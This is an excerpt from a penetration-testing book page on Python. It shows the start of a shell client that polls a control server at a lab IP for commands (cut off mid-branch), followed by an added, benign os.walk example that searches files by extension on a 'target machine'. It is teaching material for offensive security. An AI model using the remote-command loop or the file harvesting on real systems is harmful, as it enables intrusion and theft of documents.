
Python for Offensive PenTest

By : Hussam Khrais

Overview of this book

Python is an easy-to-learn and cross-platform programming language that has unlimited third-party libraries. Plenty of open source hacking tools are written in Python, which can be easily integrated within your script. This book is packed with step-by-step instructions and working examples to make you a skilled penetration tester. It is divided into clear bite-sized chunks, so you can learn at your own pace and focus on the areas of most interest to you. This book will teach you how to code a reverse shell and build an anonymous shell. You will also learn how to hack passwords and perform a privilege escalation on Windows with practical examples. You will set up your own virtual hacking environment in VirtualBox, which will help you run multiple operating systems for your testing environment. By the end of this book, you will have learned how to code your own scripts and mastered ethical hacking from scratch.

Replicating Metasploit searching for content

We will now code a Python function that searches through the target's directories and returns a list of file paths matching a specific file extension. For instance, say we need to find PDF or other document files on the target machine; instead of checking each directory by hand, we will add a new function that does the job automatically. This is very useful when you first land on a target machine and want to explore as much data as possible, such as documents, PDF files, and so on. The coding part is quite easy: we will use the Python os library to walk the directories. So, as usual, I have added a new if branch specifying that, if we receive a search keyword, we will do the following:

# Python For Offensive PenTest

# Searching for Content

import requests
import subprocess
import os
import time

while True:

    # Poll the control server (10.0.2.15 in the book's lab setup) for the next command
    req = requests.get('http://10.0.2.15')
    command = req.text

    # 'terminate' ends the loop and the client exits
    if 'terminate' in command:
        break

    elif 'grab' in command...
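The search function the paragraph above describes, written out as an added example that is not the book's own code: it walks a directory tree with os.walk and returns every file whose extension matches. The function name search_by_extension, the helper build_demo_tree, and the sample files it creates in a temporary directory are all constructed for this demonstration.

```python
# Added example (not from the book): an os.walk-based search that collects
# every file under `root` with a given extension. Names and sample data are
# constructed for the demo.
import os
import tempfile


def search_by_extension(root, extension):
    """Return sorted absolute paths of files under `root` ending in `extension`.

    Matching is case-insensitive ('.PDF' matches 'pdf'), and the extension may
    be given with or without the leading dot. os.walk skips directories it
    cannot read by default, so an unreadable subtree does not abort the search.
    """
    ext = extension.lower()
    if not ext.startswith('.'):
        ext = '.' + ext
    matches = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(ext):
                matches.append(os.path.join(dirpath, name))
    return sorted(matches)


def build_demo_tree():
    """Create a throwaway directory tree (constructed sample data) and return its root."""
    root = tempfile.mkdtemp(prefix='search_demo_')
    layout = {
        'report.pdf': b'%PDF-1.4 sample',
        'notes.txt': b'plain text, not a match',
        os.path.join('docs', 'plan.PDF'): b'%PDF-1.4 upper-case extension',
        os.path.join('docs', 'archive', 'old.pdf'): b'%PDF-1.4 nested two levels down',
        os.path.join('docs', 'archive', 'readme.docx'): b'PK word document',
    }
    for rel, content in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'wb') as fh:
            fh.write(content)
    return root


def relative_hits(root, extension):
    """Demo helper: matches as paths relative to root, with '/' separators."""
    return [os.path.relpath(p, root).replace(os.sep, '/')
            for p in search_by_extension(root, extension)]


if __name__ == '__main__':
    demo_root = build_demo_tree()
    for hit in relative_hits(demo_root, 'pdf'):
        print(hit)
```

The lower-casing of both the name and the requested extension is the detail worth keeping: a search for "pdf" that only matches the literal lower-case suffix misses files such as plan.PDF, which is common on Windows targets where the case of an extension is arbitrary.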